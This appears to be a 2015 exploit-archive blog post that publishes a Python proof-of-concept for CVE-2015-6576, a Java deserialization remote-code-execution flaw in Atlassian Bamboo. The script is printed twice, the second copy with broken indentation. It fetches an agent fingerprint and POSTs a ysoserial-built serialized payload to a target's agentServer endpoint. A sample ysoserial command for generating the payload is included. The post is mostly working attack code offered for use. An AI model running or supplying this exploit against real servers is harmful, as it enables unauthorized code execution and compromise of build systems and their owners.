A PoC for the Bamboo deserialization exploit.

K-159 / November 20, 2015 / Comments Off / Code Scripting, Exploits

A PoC for the Bamboo deserialization exploit (CVE-2015-6576), Bamboo is a continous build server from Atlassian.
introduction Deserialization Vulnerabilities in Java :
Deserialization vulnerabilities in Java are lesser known and exploited (compared to unserialize() in PHP). this bug class can be turned into serverside Remote Code Execution.

usage: ./bamboo.py host port /path/to/payload

bamboo.py Script:

#!/usr/bin/python

# This script is styled after the scripts created by Stephen Breen of Foxglove
# Security in the somewhat infamous "What Do Weblogic, Websphere, JBoss, Jenkins,
# OpenNMS, and Your Application Have in Common? A Vulnerability."
#
# The Bamboo deserialization vulnerability was discovered and disclosed to
# Atlassian by Matthais Kaiser of Code White. Matthais even gave an excellent talk
# on the subject matter. You can find it on youtube (fast forward to ~42:00 to
# go straight to the demo of this vuln):
#
# https://www.youtube.com/watch?v=VviY3O-euVQ
#
# However, Matthais didn't release the code?! So here it is, a PoC for CVE-2015-6576
#
# usage: ./bamboo.py host port /path/to/payload
#
# Note that the payload is supposed to be a payload generated by Chris Frohoff's
# ysoserial (https://github.com/frohoff/ysoserial). For example:
#
# java -jar ./ysoserial-0.0.2-SNAPSHOT-all.jar CommonsCollections1 'firefox' > payload.out

import re
import sys
import socket
import requests

if len(sys.argv) != 4:
    print 'Usage: ./bamboo.py host port /path/to/payload'
    sys.exit(0)

host = sys.argv[1]
port = sys.argv[2]
payloadObject = open(sys.argv[3], 'rb').read()

# Get the fingerprint so that we can use it in the object post
r = requests.get('http://'+host+':'+port+'/agentServer/GetFingerprint.action?agent=elastic')
match = re.search(r'^bootstrapVersion=\d+&fingerprint=([^&]+)&', r.text)

if match:
    r = requests.post('http://'+host+':'+port+'/agentServer/message?fingerprint='+match.group(1), data = payloadObject);
    if r.status_code == 401:
        print "Didn't work. Probably patched."
    elif r.status_code == 500:
        print 'It worked!'
    else:
        print 'I have no idea what happened.'
else:
    print 'Failed to get the fingerprint.'
    sys.exit(0);

#!/usr/bin/python

# This script is styled after the scripts created by Stephen Breen of Foxglove

# Security in the somewhat infamous "What Do Weblogic, Websphere, JBoss, Jenkins,

# OpenNMS, and Your Application Have in Common? A Vulnerability."

# The Bamboo deserialization vulnerability was discovered and disclosed to

# Atlassian by Matthais Kaiser of Code White. Matthais even gave an excellent talk

# on the subject matter. You can find it on youtube (fast forward to ~42:00 to

# go straight to the demo of this vuln):

# https://www.youtube.com/watch?v=VviY3O-euVQ

# However, Matthais didn't release the code?! So here it is, a PoC for CVE-2015-6576

# usage: ./bamboo.py host port /path/to/payload

# Note that the payload is supposed to be a payload generated by Chris Frohoff's

# ysoserial (https://github.com/frohoff/ysoserial). For example:

# java -jar ./ysoserial-0.0.2-SNAPSHOT-all.jar CommonsCollections1 'firefox' > payload.out

import re

import sys

import socket

import requests

if len(sys.argv) != 4:

print 'Usage: ./bamboo.py host port /path/to/payload'

sys.exit(0)

host = sys.argv[1]

port = sys.argv[2]

payloadObject = open(sys.argv[3], 'rb').read()

# Get the fingerprint so that we can use it in the object post

r = requests.get('http://'+host+':'+port+'/agentServer/GetFingerprint.action?agent=elastic')

match = re.search(r'^bootstrapVersion=\d+&fingerprint=([^&]+)&', r.text)

if match:

r = requests.post('http://'+host+':'+port+'/agentServer/message?fingerprint='+match.group(1), data = payloadObject);

if r.status_code == 401:

print "Didn't work. Probably patched."

elif r.status_code == 500:

print 'It worked!'

else:

print 'I have no idea what happened.'

else:

print 'Failed to get the fingerprint.'

sys.exit(0);

Source : https://github.com/CallMeJonas

Tags: deserialization, jar-files, Java Libraries, Jenkins, maven, RCE(Remote Code Execution), Search POC & Exploits, Server-Attack

Archives

A PoC for the Bamboo deserialization exploit.